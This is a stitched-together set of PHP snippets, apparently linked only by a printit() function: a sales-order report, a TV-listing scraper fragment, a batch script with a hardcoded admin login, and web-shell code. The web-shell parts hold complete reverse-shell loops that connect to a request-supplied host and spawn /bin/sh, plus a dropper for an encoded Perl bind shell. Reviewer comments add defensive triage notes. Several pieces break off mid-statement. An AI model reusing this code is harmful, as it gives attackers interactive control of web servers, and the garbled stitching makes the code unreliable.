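/**
 * Read the report parameters from the request and print the selected sales orders.
 *
 * Request fields (all taken from $_REQUEST):
 *   PARAM_0 first order number      PARAM_1 last order number
 *   PARAM_2 currency                PARAM_3 bank account
 *   PARAM_4 e-mail flag             PARAM_5 quote flag
 *   PARAM_6 comments
 *
 * Nothing is printed unless PARAM_0 is greater than zero.
 *
 * NOTE(review): every value is forwarded to printit() exactly as it arrived in the
 * request. printit() is not visible here; confirm that it casts or escapes $from and
 * $to before they reach a SQL statement, and that $comments is escaped on output.
 */
function print_sales_orders()
{
    $from = $_REQUEST['PARAM_0'];
    $to = $_REQUEST['PARAM_1'];
    $currency = $_REQUEST['PARAM_2'];
    $bankaccount = $_REQUEST['PARAM_3'];
    $email = $_REQUEST['PARAM_4'];
    $quote = $_REQUEST['PARAM_5'];
    $comments = $_REQUEST['PARAM_6'];

    // A missing or empty range bound is treated as 0, which disables printing below.
    if ($from == null) {
        $from = 0;
    }
    if ($to == null) {
        $to = 0;
    }

    if ($from > 0) {
        // Pass the values that were actually read above: the earlier call used the
        // undefined names $bank and $commeents, so the bank account and the comments
        // always reached printit() as null.
        printit($from, $to, $currency, $bankaccount, $email, $quote, $comments, "");
    }
}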
} $input = fread($pipes[1], $chunk_size); if ($debug) { printit("STDOUT: {$input}"); } fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) { printit("STDERR READ"); } $input = fread($pipes[2], $chunk_size); if ($debug) { printit("STDERR: {$input}"); } fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit($string) { if (!$daemon) { print "{$string}\n";
/**
 * Request dispatcher of the panel: every request is routed from this constructor.
 *
 * Reads $_POST['cmd'], $_POST['method'] and $_POST['item'] and hands them to the tool
 * classes BrowserTools, PhpTools, MySQLTools, ReverseTools and Info, none of which is
 * defined in this excerpt. The 'reverse' branch visibly opens an outbound socket and
 * spawns /bin/sh; the 'php' and 'mysql' branches forward request data to execute()
 * methods that presumably run it as code / SQL (bodies not shown). Taken together this
 * is the structure of a web shell, not of an application controller.
 *
 * Triage notes: the POST field names used here (cmd, method, item, pass, ip, port,
 * userdb, passdb, serverdb, portdb) are the panel's whole visible protocol and are the
 * strings to look for in captured request bodies.
 */
function __construct() {
    // The login page is shown only when ALL three tests hold. The dispatcher in the
    // else branch is therefore reached whenever any one of them fails, so the session
    // flag is not the only way past this check; a deployed copy should be treated as
    // reachable by parties other than whoever planted it.
    if ($_SESSION['logged'] != TRUE && $_POST['cmd'] != 'login' && empty($_POST['pass'])) {
        $this->buildPageLogin();
    } else {
        switch ($_POST['cmd']) {
            // File browser: $_POST['item'] is passed to BrowserTools::main() unmodified.
            case 'browser':
                $browserTools = new BrowserTools();
                switch ($_POST['method']) {
                    case 'show':
                        $this->buildPageStructure($browserTools->main($_POST['item'], false));
                        break;
                    case 'execute':
                        $this->buildPageStructure($browserTools->main($_POST['item']));
                        break;
                    default:
                        $this->buildPageStructure($browserTools->main('.'));
                        break;
                }
                break;
            case 'logout':
                $this->logout();
                break;
            // remove() is not shown; presumably deletes the panel itself — confirm.
            case 'remove':
                $this->remove();
                break;
            case 'php':
                $phpTools = new PhpTools();
                switch ($_POST['method']) {
                    case 'execute':
                        // Request data goes straight into Util::execute(); only the
                        // returned rows are HTML-escaped, i.e. the escaping protects
                        // the panel's own page, not the host.
                        $util = new Util();
                        $run = $util->execute($_POST['item']);
                        foreach ($run as $row) {
                            $resp[] = htmlentities(wordwrap($row, 100, ' ', TRUE), ENT_QUOTES);
                        }
                        $this->buildPageStructure($phpTools->main($resp));
                        break;
                    default:
                        $this->buildPageStructure($phpTools->main(''));
                        break;
                }
                break;
            case 'mysql':
                $mySql = new MySQLTools();
                switch ($_POST['method']) {
                    case 'connect':
                        if (!empty($_POST['userdb']) && !empty($_POST['serverdb']) && !empty($_POST['portdb'])) {
                            // Database credentials supplied in the request are kept in
                            // the PHP session, so they persist in the session store on
                            // disk for as long as the session lives.
                            $_SESSION['userdb'] = $_POST['userdb'];
                            $_SESSION['passdb'] = $_POST['passdb'];
                            $_SESSION['serverdb'] = $_POST['serverdb'];
                            $_SESSION['portdb'] = $_POST['portdb'];
                            if ($mySql->connect()) {
                                $_SESSION['connected'] = TRUE;
                                $this->buildPageStructure($mySql->main());
                            } else {
                                $error = "\n <div class='alert'>\n <strong>Warning!</strong> " . $_SESSION['linkdb']->connect_error . "\n </div>\n ";
                                $this->buildPageStructure($mySql->main($error));
                            }
                        }
                        break;
                    case 'selectdb':
                        if (!empty($_POST['item'])) {
                            $_SESSION['db'] = $_POST['item'];
                            if ($mySql->selectDb($_POST['item'])) {
                                $this->buildPageStructure($mySql->main());
                            } else {
                                $error = "\n <div class='alert'>\n <strong>Warning!</strong> Can't select the Database. 
Please try again.\n </div>\n ";
                                $this->buildPageStructure($mySql->main($error));
                            }
                        }
                        break;
                    case 'query':
                        // The whole statement comes from the request; the result is
                        // parked in the session for the next page render.
                        if (!empty($_POST['item'])) {
                            if ($result = $mySql->execute($_POST['item'])) {
                                $_SESSION['query'] = $result;
                                $this->buildPageStructure($mySql->main());
                            } else {
                                $error = "\n <div class='alert'>\n <strong>Warning!</strong> " . $_SESSION['linkdb']->error . "\n </div>\n ";
                                $this->buildPageStructure($mySql->main($error));
                            }
                        }
                        break;
                    case 'logout':
                        // Clears only the database-related session keys.
                        $_SESSION['connected'] = NULL;
                        $_SESSION['userdb'] = NULL;
                        $_SESSION['passdb'] = NULL;
                        $_SESSION['serverdb'] = NULL;
                        $_SESSION['portdb'] = NULL;
                        $_SESSION['db'] = NULL;
                        $_SESSION['linkdb'] = NULL;
                        $this->buildPageStructure($mySql->main());
                        break;
                    default:
                        $this->buildPageStructure($mySql->main());
                        break;
                }
                break;
            case 'reverse':
                $reverseTools = new ReverseTools();
                switch ($_POST['method']) {
                    case 'connect':
                        if (isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != "") {
                            // Destination address and port are taken from the request.
                            $result = "";
                            $ip = $_POST['ip'];
                            $port = $_POST['port'];
                            $chunk_size = 1400;
                            $write_a = null;
                            $error_a = null;
                            $shell = 'uname -a; /bin/sh -i';
                            $debug = 0;
                            chdir("/");
                            umask(0);
                            // Outbound TCP connection from the web server, 30 s timeout.
                            // Egress filtering on the web tier is the control that
                            // stops this step.
                            $sock = fsockopen($ip, $port, $errno, $errstr, 30);
                            if (!$sock) {
                                echo "{$errstr} ({$errno})";
                                exit(1);
                            }
                            // Child process with stdin/stdout/stderr on pipes. A PHP or
                            // web server worker that is the parent of /bin/sh is the
                            // host-level indicator; listing proc_open in php.ini
                            // disable_functions blocks it where the application has no
                            // need for the function.
                            $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
                            $process = proc_open($shell, $descriptorspec, $pipes);
                            if (!is_resource($process)) {
                                echo "ERROR: Can't spawn shell";
                                exit(1);
                            }
                            stream_set_blocking($pipes[0], 0);
                            stream_set_blocking($pipes[1], 0);
                            stream_set_blocking($pipes[2], 0);
                            stream_set_blocking($sock, 0);
                            $result .= "Successfully opened reverse shell to {$ip}:{$port}";
                            // Relay loop: socket -> child stdin, child stdout/stderr ->
                            // socket, at most $chunk_size bytes per read. stream_select()
                            // is called with a null timeout, so the request does not
                            // return until one side closes; the worker stays busy for
                            // the lifetime of the connection.
                            while (1) {
                                if (feof($sock)) {
                                    $result .= "ERROR: Shell connection terminated";
                                    break;
                                }
                                if (feof($pipes[1])) {
                                    $result .= "ERROR: Shell process terminated";
                                    break;
                                }
                                $read_a = array($sock, $pipes[1], $pipes[2]);
                                $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
                                if (in_array($sock, $read_a)) {
                                    // printit() is not defined in this excerpt; with
                                    // $debug fixed at 0 these calls are never reached.
                                    if ($debug) {
                                        printit("SOCK READ");
                                    }
                                    $input = fread($sock, $chunk_size);
                                    if ($debug) {
                                        printit("SOCK: {$input}");
                                    }
                                    fwrite($pipes[0], $input);
                                }
                                if (in_array($pipes[1], $read_a)) {
                                    if ($debug) {
                                        printit("STDOUT READ");
                                    }
                                    $input = fread($pipes[1], $chunk_size);
                                    if ($debug) {
                                        printit("STDOUT: {$input}");
                                    }
                                    fwrite($sock, $input);
                                }
                                if (in_array($pipes[2], $read_a)) {
                                    if ($debug) {
                                        printit("STDERR READ");
                                    }
                                    $input = fread($pipes[2], $chunk_size);
                                    if ($debug) {
                                        printit("STDERR: {$input}");
                                    }
                                    fwrite($sock, $input);
                                }
                            }
                            fclose($sock);
                            fclose($pipes[0]);
                            fclose($pipes[1]);
                            fclose($pipes[2]);
                            proc_close($process);
                        }
                        // $result is built above but is not passed on to the page.
                        $this->buildPageStructure($reverseTools->main());
                        break;
                    default:
                        $this->buildPageStructure($reverseTools->main(''));
                        break;
                }
                break;
            case 'login':
                // isset() is redundant next to !empty(); login() itself is not shown.
                if (isset($_POST['pass']) && !empty($_POST['pass'])) {
                    $this->login($_POST['pass']);
                }
                break;
            default:
                $info = new Info();
                $this->buildPageStructure($info->main());
                break;
        }
    }
}
} if ($flag == 2) { $pid = $sql->last_record($result); $sql->query("update program set stop=INTERVAL 1 DAY + stop where pid={$pid}"); } } $count++; } // end while } // end function printit if ($WEB) { print_header_open(); print_title("Collecting ..."); print_header_close(); } while (list($zender, $url) = each($urls)) { $uur = array(); $programma = array(); $inhoud = array(); if ($WEB) { print "Slurping {$zender}...<br>\n"; } $inhoud = connecttohttpd($url, $host); list($programma, $uur, $film) = parsecontent($inhoud, $programma, $uur, $film); printit($programma, $uur, $film, $zender); } if ($WEB) { print "done<br>"; print_page_close(); }
/**
 * Web-shell handler that gives the requester an interactive shell on the host.
 *
 * Inputs are read from the request: rev_option ($_REQUEST) selects the mode, my_ip and
 * my_port ($_GET) give the peer. Two modes are implemented:
 *   "PHP Reverse Shell" - connect out to my_ip:my_port, spawn /bin/sh and relay I/O.
 *   "PERL Bind Shell"   - unpack an embedded Perl script to disk and run it with my_port.
 * Any other value does nothing. cmd(), alert() and $bind_perl are defined elsewhere.
 *
 * Triage notes: because the parameters travel in the query string they normally appear
 * in web server access logs; the dropped file name indrajith_perl_bind.pl is an on-disk
 * indicator in the script's working directory.
 */
function reverse_conn_bg() {
    global $os;
    $option = $_REQUEST['rev_option'];
    $ip = $_GET['my_ip'];
    $port = $_GET['my_port'];
    if ($option == "PHP Reverse Shell") {
        echo "<div id=result><h2>RESULT</h2><hr /><br />";
        // Declared inside the branch, so a second call in the same request would
        // redeclare the function. $daemon here is a local of printit() and is never
        // set, so the "stay silent once daemonised" test is always true and every
        // message is printed.
        function printit($string) {
            if (!$daemon) {
                print "{$string}\n";
            }
        }
        $chunk_size = 1400;
        $write_a = null;
        $error_a = null;
        $shell = 'uname -a; w; id; /bin/sh -i';
        $daemon = 0;
        $debug = 0;
        // Where pcntl is available the parent (the process answering the HTTP request)
        // exits and the child continues in its own session. The shell then outlives
        // the request, so a PHP process with no live request behind it is worth
        // flagging during host review.
        if (function_exists('pcntl_fork')) {
            $pid = pcntl_fork();
            if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
            }
            if ($pid) {
                exit(0);
            }
            if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
            }
            $daemon = 1;
        } else {
            printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
        }
        chdir("/");
        umask(0);
        // Outbound TCP connection to the request-supplied peer, 30 s timeout. Egress
        // filtering on the web tier is the control that stops this step.
        $sock = fsockopen($ip, $port, $errno, $errstr, 30);
        if (!$sock) {
            printit("{$errstr} ({$errno})");
            exit(1);
        }
        // Child process with stdin/stdout/stderr on pipes; listing proc_open in
        // php.ini disable_functions blocks it where the application does not need it.
        $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
        $process = proc_open($shell, $descriptorspec, $pipes);
        if (!is_resource($process)) {
            printit("ERROR: Can't spawn shell");
            exit(1);
        }
        stream_set_blocking($pipes[0], 0);
        stream_set_blocking($pipes[1], 0);
        stream_set_blocking($pipes[2], 0);
        stream_set_blocking($sock, 0);
        // $ip and $port are echoed into the HTML response without escaping.
        printit("<font color=green>Successfully opened reverse shell to {$ip}:{$port} </font>");
        // Relay loop: socket -> child stdin, child stdout/stderr -> socket, at most
        // $chunk_size bytes per read; ends when either side reports EOF.
        while (1) {
            if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
            }
            if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
            }
            $read_a = array($sock, $pipes[1], $pipes[2]);
            // null timeout: blocks until at least one stream is readable.
            $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
            if (in_array($sock, $read_a)) {
                if ($debug) {
                    printit("SOCK READ");
                }
                $input = fread($sock, $chunk_size);
                if ($debug) {
                    printit("SOCK: {$input}");
                }
                fwrite($pipes[0], $input);
            }
            if (in_array($pipes[1], $read_a)) {
                if ($debug) {
                    printit("STDOUT READ");
                }
                $input = fread($pipes[1], $chunk_size);
                if ($debug) {
                    printit("STDOUT: {$input}");
                }
                fwrite($sock, $input);
            }
            if (in_array($pipes[2], $read_a)) {
                if ($debug) {
                    printit("STDERR READ");
                }
                $input = fread($pipes[2], $chunk_size);
                if ($debug) {
                    printit("STDERR: {$input}");
                }
                fwrite($sock, $input);
            }
        }
        fclose($sock);
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
        echo "<br /><br /><hr /><br /><br /></div>";
    } else {
        if ($option == "PERL Bind Shell") {
            global $bind_perl, $os;
            // $pbfl is assigned but never used.
            $pbfl = $bind_perl;
            // The embedded payload is stored base64-encoded and deflate-compressed, so
            // the Perl source is not visible to a plain-text scan of the PHP file; the
            // decoded script is written into the current working directory.
            $handlr = fopen("indrajith_perl_bind.pl", "wb");
            if ($handlr) {
                fwrite($handlr, gzinflate(base64_decode($bind_perl)));
            } else {
                alert("Access Denied for create new file");
            }
            // Called even when fopen() failed and $handlr is false.
            fclose($handlr);
            if (file_exists("indrajith_perl_bind.pl")) {
                // $os is set elsewhere; the "nix" path additionally marks the file
                // executable before running it through the perl interpreter.
                if ($os == "nix") {
                    cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl {$port}");
                } else {
                    cmd("perl indrajith_perl_bind.pl {$port}");
                }
            }
        }
    }
}
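<?php
// Batch helper: renders sales order 20 as a quote PDF by driving the reporting code
// in rep109.php without an interactive login.
//
// NOTE(review): the three $_POST assignments below run before session.inc is included,
// presumably so that the session code performs a login as "admin" from these values.
// That keeps an administrator password in the source tree and means anyone who can
// request this file gets the report run under that account. Keep the script outside
// the web root (or refuse non-CLI invocation) and load the credential from a location
// that is not under version control.
$_POST["user_name_entry_field"] = "admin";
$_POST["company_login_name"] = "0";
$_POST["password"] = "******";
$page_security = 1;
include "includes/session.inc";
chdir("./sales"); # printing of orders/quotes is called from sales directory
include "../reporting/includes/reporting.inc";
include "../reporting/includes/pdf_report.inc";
include "../reporting/rep109.php";

// Constant statement: no request data is interpolated into it.
$sql = "SELECT sales_orders.order_no from sales_orders where order_no=20";
$result = db_query($sql, $db);
if ($result) {
    // Stays null when the order does not exist, so the report is not started with an
    // undefined order number.
    $nr = null;
    while ($myrow = db_fetch($result)) {
        $nr = $myrow[0];
    }
    if ($nr !== null) {
        $bank = get_first_bank_account();
        $quote = 1;
        $comments = "";
        // NOTE(review): the output path is a fixed name in /tmp. On a multi-user host
        // confirm how printit() opens it; a pre-created file or symlink with that name
        // would be written through. A private directory is the safer target.
        printit($nr, $nr, "CHF", $bank, 0, $quote, $comments, "/tmp/output.pdf");
    }
}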
if (!is_resource($process)) { printit("ERROR: Can't spawn shell<br>"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to {$ip}:{$port}<br>"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated<br>"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated<br>"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { $input = fread($pipes[2], $chunk_size); fwrite($sock, $input);